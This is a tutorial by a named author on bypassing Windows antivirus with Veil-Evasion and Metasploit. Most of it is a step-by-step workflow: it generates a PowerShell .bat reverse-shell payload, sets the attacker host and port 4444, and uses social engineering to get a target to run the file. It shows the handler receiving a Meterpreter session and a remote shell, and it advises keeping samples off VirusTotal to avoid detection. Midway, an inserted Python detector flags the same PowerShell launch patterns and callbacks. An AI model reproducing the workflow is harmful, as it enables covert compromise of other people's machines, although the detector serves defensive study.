How To Bypass Anti-Virus In Windows Using Veil & Metasploit On Kali

by Sunny Hoi

Introduction

In this tutorial, I will show how to bypass Anti-Virus (AV) software on Windows machines using the Veil-Evasion tool and the Metasploit Framework.

Social engineering is needed to get the target user to execute the PowerShell-based bat file on their Windows 10 machine.

Of course, an exe file can be generated instead. But we’ll focus on deploying a bat file to keep this tutorial relatively short and simple.

Hence, I will show how to install Veil quickly, use Veil-Evasion to generate a PowerShell-based payload, and set up a remote handler using Metasploit.

By the end, the complete workflow of using Veil-Evasion together with Metasploit should be clear.

What Does Veil Allow A Penetration Tester To Do?

Veil lets the penetration tester deploy a remote shell that is able to bypass the majority of commercially available Anti-Virus software.


Note: This is a penetration testing tutorial. You are responsible for your own actions.


1. To get Veil working on Kali, first install it.

Type the following command into the terminal:

apt -y install veil

Prefer to install it in silent mode? When asked “Are you sure you wish to install Veil?”, enter s to continue. If you prefer the regular mode, with all the installation windows for the various dependencies and more customization options, enter y instead.

You can also force a silent installation from the command line with: /usr/share/veil/config/setup.sh --force --silent

Using Veil In Kali Linux

Open a terminal in Kali and enter: veil

Veil has two tools available.

1. Enable Veil-Evasion

This tutorial uses Veil-Evasion, so enter: 1

2. Check Available Payloads

To see the available payloads, enter: list

3. Use rev_tcp.py

Let’s go ahead and use ‘powershell/meterpreter/rev_tcp.py’ by entering: use 22

4. Change Your LHOST Variable & Confirm That The LHOST Variable Has Changed

For this payload to work, you have to set the LHOST variable to your Kali machine’s IP address.

If you are unsure what your Kali IP is, go to the terminal and enter: ifconfig

For demonstration purposes, we’ll set the LHOST to ‘192.168.0.16’ by entering: set LHOST 192.168.0.16

To confirm that you have successfully changed the LHOST variable, enter: options

5. Keep Default Port 4444

Do not change the default port ‘4444’.

6. Generate The Payload & Assign A Name To The New File

Enter: generate

Name your new file. I named mine ‘HelloFriend’.

Press Enter to continue.

7. Shell File Created

The shell file called HelloFriend.bat is placed in ‘/var/lib/veil/output/source/’.

When the target user opens this bat file on a Windows machine, it will attempt to connect back to the pentester’s Kali system.

To view the source code, go to the aforementioned directory and examine the file.

8. Run The Multi/Handler On Kali Using Metasploit Framework

The Metasploit handler must be listening before the bat file attempts to connect to your Kali machine, so set it up first.

Open Metasploit Framework from the Kali Desktop.

Enter: use multi/handler

Set the following options, adjusting LHOST to your own Kali IP:

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.0.16

set LPORT 4444

exploit


9. Confirm That The Reverse TCP Handler Is Running

If the multi/handler is running on the Kali machine, you should see a message similar to this:

[*] Started reverse TCP handler on 192.168.0.16:4444


As you can see, the Metasploit handler is running and will keep waiting until the bat file is opened on the target’s Windows system.

10. Confirm That The Created Bat File Has Been Successfully Executed On The Target Machine

If the target user opens the file and it executes successfully, a remote shell is established between their Windows machine and the penetration tester’s Kali system.

The messages would be similar to this on your Kali machine:

[*] Started reverse TCP handler on 192.168.0.16:4444

[*] Sending stage (133337 bytes) to 192.168.0.28

[*] Meterpreter session 1 opened (192.168.0.28:4444 -> 192.168.0.16:50123) 18-12-03 10:13:08 -0400
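As a defensive counterpart to steps 1 to 10, here is an added example (written for this edit, not part of the tutorial, Veil or Metasploit) that flags the two host-side traces the procedure leaves: a .bat file spawning a hidden, encoded PowerShell, and that PowerShell process calling back to LHOST on port 4444. It assumes Sysmon-style Event ID 1 and 3 field names; the switch patterns, GUIDs, paths and sample events are assumed or constructed.

```python
import re
# Switches commonly stacked in hidden, non-interactive, encoded PowerShell launches (assumed patterns).
EVASION_FLAGS = {
    "no profile": r"-nop(rofile)?\b",
    "hidden window": r"-w(indowstyle)?\s+hidden\b",
    "encoded command": r"-e(c|nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}",
    "non-interactive": r"-noni(nteractive)?\b",
    "execution policy bypass": r"-e(p|xec|xecutionpolicy)\s+bypass\b",
}
CALLBACK_PORTS = {4444}  # Metasploit/Veil default kept in this tutorial; tune per environment

def flag_process_event(ev):
    """Reasons a Sysmon EID 1 record looks like a .bat-launched PowerShell stager ([] if clean)."""
    if not ev.get("Image", "").lower().endswith("powershell.exe"):
        return []
    reasons = []
    parent, pcmd = ev.get("ParentImage", "").lower(), ev.get("ParentCommandLine", "").lower()
    if parent.endswith("cmd.exe") and ".bat" in pcmd:
        reasons.append("powershell.exe spawned by cmd.exe running a .bat file")
    cmd = ev.get("CommandLine", "").lower()
    hits = [name for name, pat in EVASION_FLAGS.items() if re.search(pat, cmd)]
    if len(hits) >= 2:  # one switch is normal in admin scripts; several together is not
        reasons.append("stacked evasion switches: " + ", ".join(hits))
    return reasons

def flag_network_event(ev):
    """Reasons a Sysmon EID 3 record looks like an outbound reverse-TCP callback ([] if clean)."""
    if not ev.get("Image", "").lower().endswith("powershell.exe") or ev.get("Initiated") != "true":
        return []
    port = int(ev.get("DestinationPort", 0))
    return [f"powershell.exe opened TCP to {ev.get('DestinationIp')}:{port}"] if port in CALLBACK_PORTS else []

def scan(events):
    """Return [(ProcessGuid, [reasons])] for every event that trips a rule."""
    checks = {1: flag_process_event, 3: flag_network_event}
    out = []
    for ev in events:
        reasons = checks.get(ev.get("EventID"), lambda _: [])(ev)
        if reasons:
            out.append((ev.get("ProcessGuid"), reasons))
    return out

# Constructed sample events; the encoded command is UTF-16LE "echo hello", not a real stager.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "{guid-1}", "Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "ParentCommandLine": r'cmd.exe /c "C:\Users\alice\Downloads\HelloFriend.bat"',
     "CommandLine": "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc ZQBjAGgAbwAgAGgAZQBsAGwAbwA="},
    {"EventID": 3, "ProcessGuid": "{guid-1}", "Image": PS, "Initiated": "true",
     "SourceIp": "192.168.0.28", "DestinationIp": "192.168.0.16", "DestinationPort": "4444"},
    {"EventID": 1, "ProcessGuid": "{guid-2}", "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "ParentCommandLine": "explorer.exe", "CommandLine": "powershell.exe -NoProfile -Command Get-Date"},
]
```

Running scan(SAMPLE_EVENTS) reports the first two events under the same ProcessGuid and stays silent on the ordinary admin launch, which is the correlation a SOC analyst would pivot on.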


Adjustments May Be Needed Due To Advancements In Anti-Virus Detection

Since Anti-Virus engines are now sophisticated at detecting PowerShell-based malware, it is worth exploring the alternative payload options available in Veil, both for evasion and for learning purposes.

Thus, this penetration testing guide serves as a starting point for IT security enthusiasts and professionals.

Also, remember not to submit files created by these penetration testing tools to VirusTotal. This is obvious, but sometimes people forget.

Check For A Reverse Shell

Check whether you have a working shell by entering at the meterpreter prompt: shell

If successful, you see output similar to the following:

meterpreter > shell

Process 1337 created.

Channel 1 created.

Microsoft Windows

C:\Users\Sunny\Desktop>


Conclusion

Veil and Metasploit are significant tools in the armory of an IT security professional.

Cyber threat actors ought always to be looking for security vulnerabilities and developing clever tactics for bypassing AV solutions. Patience is just as necessary as learning.
